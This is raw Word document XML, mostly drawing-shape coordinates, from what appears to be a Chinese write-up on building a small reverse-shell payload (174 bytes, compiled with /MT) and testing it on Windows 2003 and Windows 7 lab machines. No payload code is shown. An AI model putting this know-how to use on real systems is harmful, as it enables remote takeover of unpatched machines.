5704,2095,15703,2095,15702,2095,15701,2095,15699,2095,15698,2095,15697,2095,15695,2095,15694,2095,15692,2095,15691,2095,15689,2095,15688,2095,15686,2095,15684,2095,15682,2095,15680,2095,15678,2095,15676,2095,15674,2095,15672,2095,15670,2095,15668,2095,15665,2095,15663,2095,15661,2095,15658,2095,15655,2095,15653,2095,15650,2095,15647,2095,15644,2095,15641,2095,15638,2095,15635,2095,15632,2095,15629,2095,15626,2095,15622,2095,15619,2095,15615,2095,15612,2095,15608,2095,15604,2095,15600,2095,15596,2095,15592,2095,15588,2095,15584,2095,15579,2095,15575,2095,15571,2095,15566,2095,15561,2095,15556,2095,15552,2095,15547,2095,15542,2095,15536,2095,15531,2095,15526,2095,15520,2095,15515,2095,15509,2095,15503,2095,15498,2095,15492,2095,15486,2095,15479,2095,15473,2095,15467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p</w:t>
      </w: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ayload大小如下：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3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174字节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3189" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第三次靶机测试：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分别测试Windows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2003，Windws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7，reverse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OK。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并且最终编译运行库依然为：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/MT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1" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5511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Started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reverse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278.865pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,5577">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:5577" coordorigin="10402,0" coordsize="0,5577" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,3,10402,4,10402,5,10402,7,10402,9,10402,11,10402,13,10402,16,10402,19,10402,22,10402,26,10402,30,10402,35,10402,40,10402,45,10402,51,10402,58,10402,65,10402,72,10402,80,10402,89,10402,98,10402,108,10402,118,10402,130,10402,141,10402,154,10402,167,10402,181,10402,196,10402,211,10402,228,10402,245,10402,263,10402,281,10402,301,10402,322,10402,343,10402,366,10402,389,10402,413,10402,439,10402,465,10402,492,10402,521,10402,550,10402,581,10402,612,10402,645,10402,679,10402,714,10402,751,10402,788,10402,827,10402,867,10402,908,10402,951,10402,995,10402,1040,10402,1087,10402,1135,10402,1184,10402,1235,10402,1287,10402,1341,10402,1396,10402,1452,10402,1510,10402,1570,10402,1631,10402,1694,10402,1758,10402,1824,10402,1892,10402,1961,10402,2032,10402,2105,10402,2179,10402,2255,10402,2333,10402,2412,10402,2494,10402,2577,10402,2662,10402,2748,10402,2837,10402,2928,10402,3020,10402,3115,10402,3211,10402,3309,10402,3409,10402,3512,10402,3616,10402,3722,10402,3831,10402,3941,10402,4054,10402,4169,10402,4286,10402,4405,10402,4526,10402,4649,10402,4775,10402,4903,10402,5033,10402,5166,10402,5300,10402,5437,10402,5577e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:390" coordorigin="1490,970" coordsize="8990,39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7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70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999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999l1517,999,1517,999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7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70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32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1350" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:1350;width:8990;height:650" coordorigin="1490,1350" coordsize="8990,65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6,10484,1376,10484,1376,10484,1376,10484,1377,10484,1377,10484,1377,10484,1378,10484,1378,10484,1379,10484,1379,10484,1380,10484,1381,10484,1381,10484,1382,10484,1383,10484,1384,10484,1385,10484,1386,10484,1387,10484,1388,10484,1389,10484,1391,10484,1392,10484,1394,10484,1395,10484,1397,10484,1399,10484,1400,10484,1402,10484,1404,10484,1407,10484,1409,10484,1411,10484,1414,10484,1416,10484,1419,10484,1421,10484,1424,10484,1427,10484,1430,10484,1434,10484,1437,10484,1440,10484,1444,10484,1448,10484,1452,10484,1455,10484,1460,10484,1464,10484,1468,10484,1473,10484,1477,10484,1482,10484,1487,10484,1492,10484,1498,10484,1503,10484,1509,10484,1514,10484,1520,10484,1526,10484,1532,10484,1539,10484,1545,10484,1552,10484,1559,10484,1566,10484,1573,10484,1581,10484,1589,10484,1596,10484,1604,10484,1613,10484,1621,10484,1630,10484,1638,10484,1647,10484,1657,10484,1666,10484,1676,10484,1685,10484,1695,10484,1706,10484,1716,10484,1727,10484,1738,10484,1749,10484,1760,10484,1772,10484,1783,10484,1795,10484,1808,10484,1820,10484,1833,10484,1846,10484,1859,10484,1873,10484,1886,10484,1900,10484,1914,10484,1929,10484,1944,10484,1959,10484,1974,10484,1989,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10483,2005,10482,2005,10482,2005,10480,2005,10479,2005,10477,2005,10475,2005,10473,2005,10470,2005,10466,2005,10462,2005,10458,2005,10453,2005,10448,2005,10442,2005,10435,2005,10428,2005,10419,2005,10411,2005,10401,2005,10391,2005,10379,2005,10367,2005,10354,2005,10340,2005,10326,2005,10310,2005,10293,2005,10275,2005,10256,2005,10236,2005,10215,2005,10192,2005,10168,2005,10143,2005,10117,2005,10090,2005,10061,2005,10031,2005,9999,2005,9966,2005,9931,2005,9895,2005,9858,2005,9819,2005,9778,2005,9735,2005,9691,2005,9646,2005,9598,2005,9549,2005,9498,2005,9445,2005,9391,2005,9334,2005,9275,2005,9215,2005,9153,2005,9088,2005,9022,2005,8953,2005,8883,2005,8810,2005,8735,2005,8658,2005,8578,2005,8497,2005,8413,2005,8326,2005,8238,2005,8146,2005,8053,2005,7957,2005,7859,2005,7758,2005,7654,2005,7548,2005,7439,2005,7328,2005,7214,2005,7097,2005,6977,2005,6855,2005,6730,2005,6602,2005,6471,2005,6337,2005,6201,2005,6061,2005,5918,2005,5773,2005,5624,2005,5472,2005,5317,2005,5159,2005,4997,2005,4833,2005,4665,2005,4494,2005,4319,2005,4141,2005,3960,2005,3776,2005,3587,2005,3396,2005,3201,2005,3002,2005,2800,2005,2594,2005,2385,2005,2172,2005,1955,2005,1734,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2004,1510,2004,1510,2004,1510,2004,1510,2003,1510,2003,1510,2003,1510,2002,1510,2002,1510,2002,1510,2001,1510,2000,1510,2000,1510,1999,1510,1998,1510,1998,1510,1997,1510,1996,1510,1995,1510,1994,1510,1993,1510,1992,1510,1990,1510,1989,1510,1988,1510,1986,1510,1984,1510,1983,1510,1981,1510,1979,1510,1977,1510,1975,1510,1973,1510,1971,1510,1969,1510,1966,1510,1964,1510,1961,1510,1958,1510,1955,1510,1952,1510,1949,1510,1946,1510,1943,1510,1939,1510,1936,1510,1932,1510,1928,1510,1924,1510,1920,1510,1916,1510,1911,1510,1907,1510,1902,1510,1897,1510,1893,1510,1887,1510,1882,1510,1877,1510,1871,1510,1865,1510,1859,1510,1853,1510,1847,1510,1841,1510,1834,1510,1828,1510,1821,1510,1813,1510,1806,1510,1799,1510,1791,1510,1783,1510,1775,1510,1767,1510,1759,1510,1750,1510,1741,1510,1732,1510,1723,1510,1714,1510,1704,1510,1694,1510,1684,1510,1674,1510,1664,1510,1653,1510,1642,1510,1631,1510,1620,1510,1608,1510,1596,1510,1584,1510,1572,1510,1560,1510,1547,1510,1534,1510,1521,1510,1507,1510,1493,1510,1480,1510,1465,1510,1451,1510,1436,1510,1421,1510,1406,1510,1390,1510,1375e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:68.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1370" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:1370;width:30;height:630" coordorigin="1490,1370" coordsize="30,630" path="m1517,1375l1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1376,1517,1376,1517,1376,1517,1376,1517,1377,1517,1377,1517,1377,1517,1378,1517,1378,1517,1379,1517,1379,1517,1380,1517,1381,1517,1381,1517,1382,1517,1383,1517,1384,1517,1385,1517,1386,1517,1387,1517,1388,1517,1389,1517,1391,1517,1392,1517,1394,1517,1395,1517,1397,1517,1399,1517,1400,1517,1402,1517,1404,1517,1407,1517,1409,1517,1411,1517,1414,1517,1416,1517,1419,1517,1421,1517,1424,1517,1427,1517,1430,1517,1434,1517,1437,1517,1440,1517,1444,1517,1448,1517,1452,1517,1455,1517,1460,1517,1464,1517,1468,1517,1473,1517,1477,1517,1482,1517,1487,1517,1492,1517,1498,1517,1503,1517,1509,1517,1514,1517,1520,1517,1526,1517,1532,1517,1539,1517,1545,1517,1552,1517,1559,1517,1566,1517,1573,1517,1581,1517,1589,1517,1596,1517,1604,1517,1613,1517,1621,1517,1630,1517,1638,1517,1647,1517,1657,1517,1666,1517,1676,1517,1685,1517,1695,1517,1706,1517,1716,1517,1727,1517,1738,1517,1749,1517,1760,1517,1772,1517,1783,1517,1795,1517,1808,1517,1820,1517,1833,1517,1846,1517,1859,1517,1873,1517,1886,1517,1900,1517,1914,1517,1929,1517,1944,1517,1959,1517,1974,1517,1989,1517,2005e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:99.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1990" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:1990;width:8990;height:350" coordorigin="1490,1990" coordsize="8990,350" path="m1510,2005l1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1511,2005,1512,2005,1512,2005,1514,2005,1515,2005,1517,2005,1519,2005,1521,2005,1524,2005,1528,2005,1532,2005,1536,2005,1541,2005,1546,2005,1552,2005,1559,2005,1566,2005,1575,2005,1583,2005,1593,2005,1603,2005,1615,2005,1627,2005,1640,2005,1654,2005,1668,2005,1684,2005,1701,2005,1719,2005,1738,2005,1758,2005,1780,2005,1802,2005,1826,2005,1851,2005,1877,2005,1904,2005,1933,2005,1963,2005,1995,2005,2028,2005,2063,2005,2099,2005,2136,2005,2175,2005,2216,2005,2259,2005,2303,2005,2348,2005,2396,2005,2445,2005,2496,2005,2549,2005,2604,2005,2660,2005,2719,2005,2779,2005,2841,2005,2906,2005,2972,2005,3041,2005,3112,2005,3184,2005,3259,2005,3336,2005,3416,2005,3498,2005,3582,2005,3668,2005,3757,2005,3848,2005,3941,2005,4037,2005,4136,2005,4236,2005,4340,2005,4446,2005,4555,2005,4666,2005,4780,2005,4897,2005,5017,2005,5139,2005,5264,2005,5392,2005,5523,2005,5657,2005,5793,2005,5933,2005,6076,2005,6222,2005,6370,2005,6522,2005,6677,2005,6835,2005,6997,2005,7161,2005,7329,2005,7500,2005,7675,2005,7853,2005,8034,2005,8219,2005,8407,2005,8598,2005,8793,2005,8992,2005,9194,2005,9400,2005,9609,2005,9823,2005,10039,2005,10260,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2006,10484,2006,10484,2006,10484,2006,10484,2006,10484,2006,10484,2007,10484,2007,10484,2007,10484,2007,10484,2008,10484,2008,10484,2009,10484,2009,10484,2010,10484,2010,10484,2011,10484,2011,10484,2012,10484,2012,10484,2013,10484,2014,10484,2015,10484,2015,10484,2016,10484,2017,10484,2018,10484,2019,10484,2020,10484,2021,10484,2022,10484,2024,10484,2025,10484,2026,10484,2028,10484,2029,10484,2031,10484,2032,10484,2034,10484,2036,10484,2037,10484,2039,10484,2041,10484,2043,10484,2045,10484,2047,10484,2049,10484,2051,10484,2054,10484,2056,10484,2059,10484,2061,10484,2064,10484,2067,10484,2069,10484,2072,10484,2075,10484,2078,10484,2081,10484,2085,10484,2088,10484,2091,10484,2095,10484,2099,10484,2102,10484,2106,10484,2110,10484,2114,10484,2118,10484,2122,10484,2126,10484,2131,10484,2135,10484,2140,10484,2145,10484,2149,10484,2154,10484,2159,10484,2165,10484,2170,10484,2175,10484,2181,10484,2186,10484,2192,10484,2198,10484,2204,10484,2210,10484,2216,10484,2222,10484,2229,10484,2235,10484,2242,10484,2249,10484,2256,10484,2263,10484,2270,10484,2278,10484,2285,10484,2293,10484,2301,10484,2308,10484,2317,10484,2325,10484,2333,10484,2342,10484,2350,10484,2350,10484,2350,10484,2350,10484,2350,10484,2350,10484,2350,10483,2350,10482,2350,10482,2350,10480,2350,10479,2350,10477,2350,10475,2350,10473,2350,10470,2350,10466,2350,10462,2350,10458,2350,10453,2350,10448,2350,10442,2350,10435,2350,10428,2350,10419,2350,10411,2350,10401,2350,10391,2350,10379,2350,10367,2350,10354,2350,10340,2350,10326,2350,10310,2350,10293,2350,10275,2350,10256,2350,10236,2350,10215,2350,10192,2350,10168,2350,10143,2350,10117,2350,10090,2350,10061,2350,10031,2350,9999,2350,9966,2350,9931,2350,9895,2350,9858,2350,9819,2350,9778,2350,9735,2350,9691,2350,9646,2350,9598,2350,9549,2350,9498,2350,9445,2350,9391,2350,9334,2350,9275,2350,9215,2350,9153,2350,9088,2350,9022,2350,8953,2350,8883,2350,8810,2350,8735,2350,8658,2350,8578,2350,8497,2350,8413,2350,8326,2350,8238,2350,8146,2350,8053,2350,7957,2350,7859,2350,7758,2350,7654,2350,7548,2350,7439,2350,7328,2350,7214,2350,7097,2350,6977,2350,6855,2350,6730,2350,6602,2350,6471,2350,6337,2350,6201,2350,6061,2350,5918,2350,5773,2350,5624,2350,5472,2350,5317,2350,5159,2350,4997,2350,4833,2350,4665,2350,4494,2350,4319,2350,4141,2350,3960,2350,3776,2350,3587,2350,3396,2350,3201,2350,3002,2350,2800,2350,2594,2350,2385,2350,2172,2350,1955,2350,1734,2350,1510,2350,1510,2350,1510,2350,1510,2350,1510,2350,1510,2350,1510,2350,1510,2350,1510,2350,1510,2350,1510,2350,1510,2350,1510,2350,1510,2350,1510,2350,1510,2350,1510,2349,1510,2349,1510,2349,1510,2349,1510,2349,1510,2349,1510,2348,1510,2348,1510,2348,1510,2347,1510,2347,1510,2347,1510,2346,1510,2346,1510,2345,1510,2345,1510,2344,1510,2343,1510,2343,1510,2342,1510,2341,1510,2341,1510,2340,1510,2339,1510,2338,1510,2337,1510,2336,1510,2335,1510,2334,1510,2333,1510,2332,1510,2330,1510,2329,1510,2328,1510,2326,1510,2325,1510,2323,1510,2321,1510,2320,1510,2318,1510,2316,1510,2314,1510,2312,1510,2310,1510,2308,1510,2306,1510,2304,1510,2301,1510,2299,1510,2296,1510,2294,1510,2291,1510,2289,1510,2286,1510,2283,1510,2280,1510,2277,1510,2274,1510,2270,1510,2267,1510,2264,1510,2260,1510,2257,1510,2253,1510,2249,1510,2245,1510,2241,1510,2237,1510,2233,1510,2229,1510,2224,1510,2220,1510,2215,1510,2211,1510,2206,1510,2201,1510,2196,1510,2191,1510,2185,1510,2180,1510,2175,1510,2169,1510,2163,1510,2157,1510,2151,1510,2145,1510,2139,1510,2133,1510,2126,1510,2120,1510,2113,1510,2106,1510,2099,1510,2092,1510,2085,1510,2078,1510,2070,1510,2062,1510,2055,1510,2047,1510,2039,1510,2030,1510,2022,1510,2014,1510,2005e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:99.500pt;width:1.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1990" coordsize="30,350">
        <v:shape style="position:absolute;left:1490;top:1990;width:30;height:350" coordorigin="1490,1990" coordsize="30,350" path="m1517,2005l1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2006,1517,2006,1517,2006,1517,2006,1517,2006,1517,2006,1517,2007,1517,2007,1517,2007,1517,2007,1517,2008,1517,2008,1517,2009,1517,2009,1517,2010,1517,2010,1517,2011,1517,2011,1517,2012,1517,2012,1517,2013,1517,2014,1517,2015,1517,2015,1517,2016,1517,2017,1517,2018,1517,2019,1517,2020,1517,2021,1517,2022,1517,2024,1517,2025,1517,2026,1517,2028,1517,2029,1517,2031,1517,2032,1517,2034,1517,2036,1517,2037,1517,2039,1517,2041,1517,2043,1517,2045,1517,2047,1517,2049,1517,2051,1517,2054,1517,2056,1517,2059,1517,2061,1517,2064,1517,2067,1517,2069,1517,2072,1517,2075,1517,2078,1517,2081,1517,2085,1517,2088,1517,2091,1517,2095,1517,2099,1517,2102,1517,2106,1517,2110,1517,2114,1517,2118,1517,2122,1517,2126,1517,2131,1517,2135,1517,2140,1517,2145,1517,2149,1517,2154,1517,2159,1517,2165,1517,2170,1517,2175,1517,2181,1517,2186,1517,2192,1517,2198,1517,2204,1517,2210,1517,2216,1517,2222,1517,2229,1517,2235,1517,2242,1517,2249,1517,2256,1517,2263,1517,2270,1517,2278,1517,2285,1517,2293,1517,2301,1517,2308,1517,2317,1517,2325,1517,2333,1517,2342,1517,2350e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:116.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2330" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2330;width:8990;height:370" coordorigin="1490,2330" coordsize="8990,370" path="m1510,2350l1510,2350,1510,2350,1510,2350,1510,2350,1510,2350,1510,2350,1511,2350,1512,2350,1512,2350,1514,2350,1515,2350,1517,2350,1519,2350,1521,2350,1524,2350,1528,2350,1532,2350,1536,2350,1541,2350,1546,2350,1552,2350,1559,2350,1566,2350,1575,2350,1583,2350,1593,2350,1603,2350,1615,2350,1627,2350,1640,2350,1654,2350,1668,2350,1684,2350,1701,2350,1719,2350,1738,2350,1758,2350,1780,2350,1802,2350,1826,2350,1851,2350,1877,2350,1904,2350,1933,2350,1963,2350,1995,2350,2028,2350,2063,2350,2099,2350,2136,2350,2175,2350,2216,2350,2259,2350,2303,2350,2348,2350,2396,2350,2445,2350,2496,2350,2549,2350,2604,2350,2660,2350,2719,2350,2779,2350,2841,2350,2906,2350,2972,2350,3041,2350,3112,2350,3184,2350,3259,2350,3336,2350,3416,2350,3498,2350,3582,2350,3668,2350,3757,2350,3848,2350,3941,2350,4037,2350,4136,2350,4236,2350,4340,2350,4446,2350,4555,2350,4666,2350,4780,2350,4897,2350,5017,2350,5139,2350,5264,2350,5392,2350,5523,2350,5657,2350,5793,2350,5933,2350,6076,2350,6222,2350,6370,2350,6522,2350,6677,2350,6835,2350,6997,2350,7161,2350,7329,2350,7500,2350,7675,2350,7853,2350,8034,2350,8219,2350,8407,2350,8598,2350,8793,2350,8992,2350,9194,2350,9400,2350,9609,2350,9823,2350,10039,2350,10260,2350,10484,2350,10484,2350,10484,2350,10484,2350,10484,2350,10484,2350,10484,2350,10484,2350,10484,2350,10484,2350,10484,2350,10484,2350,10484,2350,10484,2351,10484,2351,10484,2351,10484,2351,10484,2351,10484,2351,10484,2351,10484,2352,10484,2352,10484,2352,10484,2352,10484,2353,10484,2353,10484,2354,10484,2354,10484,2354,10484,2355,10484,2355,10484,2356,10484,2357,10484,2357,10484,2358,10484,2359,10484,2359,10484,2360,10484,2361,10484,2362,10484,2363,10484,2364,10484,2365,10484,2366,10484,2367,10484,2368,10484,2370,10484,2371,10484,2372,10484,2374,10484,2375,10484,2377,10484,2379,10484,2380,10484,2382,10484,2384,10484,2386,10484,2388,10484,2390,10484,2392,10484,2394,10484,2396,10484,2399,10484,2401,10484,2404,10484,2406,10484,2409,10484,2412,10484,2414,10484,2417,10484,2420,10484,2423,10484,2427,10484,2430,10484,2433,10484,2437,10484,2440,10484,2444,10484,2448,10484,2452,10484,2456,10484,2460,10484,2464,10484,2468,10484,2472,10484,2477,10484,2481,10484,2486,10484,2491,10484,2496,10484,2501,10484,2506,10484,2511,10484,2517,10484,2522,10484,2528,10484,2533,10484,2539,10484,2545,10484,2551,10484,2558,10484,2564,10484,2570,10484,2577,10484,2584,10484,2591,10484,2598,10484,2605,10484,2612,10484,2619,10484,2627,10484,2635,10484,2642,10484,2650,10484,2659,10484,2667,10484,2675,10484,2684,10484,2693,10484,2701,10484,2710,10484,2710,10484,2710,10484,2710,10484,2710,10484,2710,10484,2710,10483,2710,10482,2710,10482,2710,10480,2710,10479,2710,10477,2710,10475,2710,10473,2710,10470,2710,10466,2710,10462,2710,10458,2710,10453,2710,10448,2710,10442,2710,10435,2710,10428,2710,10419,2710,10411,2710,10401,2710,10391,2710,10379,2710,10367,2710,10354,2710,10340,2710,10326,2710,10310,2710,10293,2710,10275,2710,10256,2710,10236,2710,10215,2710,10192,2710,10168,2710,10143,2710,10117,2710,10090,2710,10061,2710,10031,2710,9999,2710,9966,2710,9931,2710,9895,2710,9858,2710,9819,2710,9778,2710,9735,2710,9691,2710,9646,2710,9598,2710,9549,2710,9498,2710,9445,2710,9391,2710,9334,2710,9275,2710,9215,2710,9153,2710,9088,2710,9022,2710,8953,2710,8883,2710,8810,2710,8735,2710,8658,2710,8578,2710,8497,2710,8413,2710,8326,2710,8238,2710,8146,2710,8053,2710,7957,2710,7859,2710,7758,2710,7654,2710,7548,2710,7439,2710,7328,2710,7214,2710,7097,2710,6977,2710,6855,2710,6730,2710,6602,2710,6471,2710,6337,2710,6201,2710,6061,2710,5918,2710,5773,2710,5624,2710,5472,2710,5317,2710,5159,2710,4997,2710,4833,2710,4665,2710,4494,2710,4319,2710,4141,2710,3960,2710,3776,2710,3587,2710,3396,2710,3201,2710,3002,2710,2800,2710,2594,2710,2385,2710,2172,2710,1955,2710,1734,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2709,1510,2709,1510,2709,1510,2709,1510,2709,1510,2708,1510,2708,1510,2708,1510,2707,1510,2707,1510,2707,1510,2706,1510,2706,1510,2705,1510,2705,1510,2704,1510,2703,1510,2703,1510,2702,1510,2701,1510,2700,1510,2700,1510,2699,1510,2698,1510,2697,1510,2696,1510,2695,1510,2693,1510,2692,1510,2691,1510,2690,1510,2688,1510,2687,1510,2685,1510,2684,1510,2682,1510,2680,1510,2679,1510,2677,1510,2675,1510,2673,1510,2671,1510,2669,1510,2666,1510,2664,1510,2662,1510,2659,1510,2657,1510,2654,1510,2652,1510,2649,1510,2646,1510,2643,1510,2640,1510,2637,1510,2634,1510,2631,1510,2627,1510,2624,1510,2620,1510,2617,1510,2613,1510,2609,1510,2605,1510,2601,1510,2597,1510,2593,1510,2588,1510,2584,1510,2579,1510,2574,1510,2570,1510,2565,1510,2560,1510,2555,1510,2549,1510,2544,1510,2538,1510,2533,1510,2527,1510,2521,1510,2515,1510,2509,1510,2503,1510,2497,1510,2490,1510,2484,1510,2477,1510,2470,1510,2463,1510,2456,1510,2449,1510,2441,1510,2434,1510,2426,1510,2418,1510,2410,1510,2402,1510,2394,1510,2385,1510,2377,1510,2368,1510,2359,1510,2350e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:116.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2330" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:2330;width:30;height:370" coordorigin="1490,2330" coordsize="30,370" path="m1517,2350l1517,2350,1517,2350,1517,2350,1517,2350,1517,2350,1517,2350,1517,2350,1517,2350,1517,2350,1517,2350,1517,2350,1517,2350,1517,2351,1517,2351,1517,2351,1517,2351,1517,2351,1517,2351,1517,2351,1517,2352,1517,2352,1517,2352,1517,2352,1517,2353,1517,2353,1517,2354,1517,2354,1517,2354,1517,2355,1517,2355,1517,2356,1517,2357,1517,2357,1517,2358,1517,2359,1517,2359,1517,2360,1517,2361,1517,2362,1517,2363,1517,2364,1517,2365,1517,2366,1517,2367,1517,2368,1517,2370,1517,2371,1517,2372,1517,2374,1517,2375,1517,2377,1517,2379,1517,2380,1517,2382,1517,2384,1517,2386,1517,2388,1517,2390,1517,2392,1517,2394,1517,2396,1517,2399,1517,2401,1517,2404,1517,2406,1517,2409,1517,2412,1517,2414,1517,2417,1517,2420,1517,2423,1517,2427,1517,2430,1517,2433,1517,2437,1517,2440,1517,2444,1517,2448,1517,2452,1517,2456,1517,2460,1517,2464,1517,2468,1517,2472,1517,2477,1517,2481,1517,2486,1517,2491,1517,2496,1517,2501,1517,2506,1517,2511,1517,2517,1517,2522,1517,2528,1517,2533,1517,2539,1517,2545,1517,2551,1517,2558,1517,2564,1517,2570,1517,2577,1517,2584,1517,2591,1517,2598,1517,2605,1517,2612,1517,2619,1517,2627,1517,2635,1517,2642,1517,2650,1517,2659,1517,2667,1517,2675,1517,2684,1517,2693,1517,2701,1517,2710e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:134.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2690" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:2690;width:8990;height:390" coordorigin="1490,2690" coordsize="8990,390" path="m1510,2710l1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1511,2710,1512,2710,1512,2710,1514,2710,1515,2710,1517,2710,1519,2710,1521,2710,1524,2710,1528,2710,1532,2710,1536,2710,1541,2710,1546,2710,1552,2710,1559,2710,1566,2710,1575,2710,1583,2710,1593,2710,1603,2710,1615,2710,1627,2710,1640,2710,1654,2710,1668,2710,1684,2710,1701,2710,1719,2710,1738,2710,1758,2710,1780,2710,1802,2710,1826,2710,1851,2710,1877,2710,1904,2710,1933,2710,1963,2710,1995,2710,2028,2710,2063,2710,2099,2710,2136,2710,2175,2710,2216,2710,2259,2710,2303,2710,2348,2710,2396,2710,2445,2710,2496,2710,2549,2710,2604,2710,2660,2710,2719,2710,2779,2710,2841,2710,2906,2710,2972,2710,3041,2710,3112,2710,3184,2710,3259,2710,3336,2710,3416,2710,3498,2710,3582,2710,3668,2710,3757,2710,3848,2710,3941,2710,4037,2710,4136,2710,4236,2710,4340,2710,4446,2710,4555,2710,4666,2710,4780,2710,4897,2710,5017,2710,5139,2710,5264,2710,5392,2710,5523,2710,5657,2710,5793,2710,5933,2710,6076,2710,6222,2710,6370,2710,6522,2710,6677,2710,6835,2710,6997,2710,7161,2710,7329,2710,7500,2710,7675,2710,7853,2710,8034,2710,8219,2710,8407,2710,8598,2710,8793,2710,8992,2710,9194,2710,9400,2710,9609,2710,9823,2710,10039,2710,10260,2710,10484,2710,10484,2710,10484,2710,10484,2710,10484,2710,10484,2710,10484,2710,10484,2710,10484,2710,10484,2710,10484,2711,10484,2711,10484,2711,10484,2711,10484,2711,10484,2711,10484,2711,10484,2711,10484,2711,10484,2712,10484,2712,10484,2712,10484,2712,10484,2713,10484,2713,10484,2713,10484,2714,10484,2714,10484,2715,10484,2715,10484,2716,10484,2716,10484,2717,10484,2718,10484,2718,10484,2719,10484,2720,10484,2721,10484,2722,10484,2723,10484,2724,10484,2725,10484,2726,10484,2727,10484,2728,10484,2729,10484,2731,10484,2732,10484,2733,10484,2735,10484,2737,10484,2738,10484,2740,10484,2742,10484,2744,10484,2745,10484,2747,10484,2749,10484,2752,10484,2754,10484,2756,10484,2758,10484,2761,10484,2763,10484,2766,10484,2769,10484,2772,10484,2774,10484,2777,10484,2780,10484,2784,10484,2787,10484,2790,10484,2793,10484,2797,10484,2801,10484,2804,10484,2808,10484,2812,10484,2816,10484,2820,10484,2824,10484,2829,10484,2833,10484,2838,10484,2842,10484,2847,10484,2852,10484,2857,10484,2862,10484,2867,10484,2873,10484,2878,10484,2884,10484,2889,10484,2895,10484,2901,10484,2907,10484,2914,10484,2920,10484,2926,10484,2933,10484,2940,10484,2947,10484,2954,10484,2961,10484,2968,10484,2976,10484,2983,10484,2991,10484,2999,10484,3007,10484,3015,10484,3023,10484,3032,10484,3040,10484,3049,10484,3058,10484,3067,10484,3076,10484,3086,10484,3086,10484,3086,10484,3086,10484,3086,10484,3086,10484,3086,10483,3086,10482,3086,10482,3086,10480,3086,10479,3086,10477,3086,10475,3086,10473,3086,10470,3086,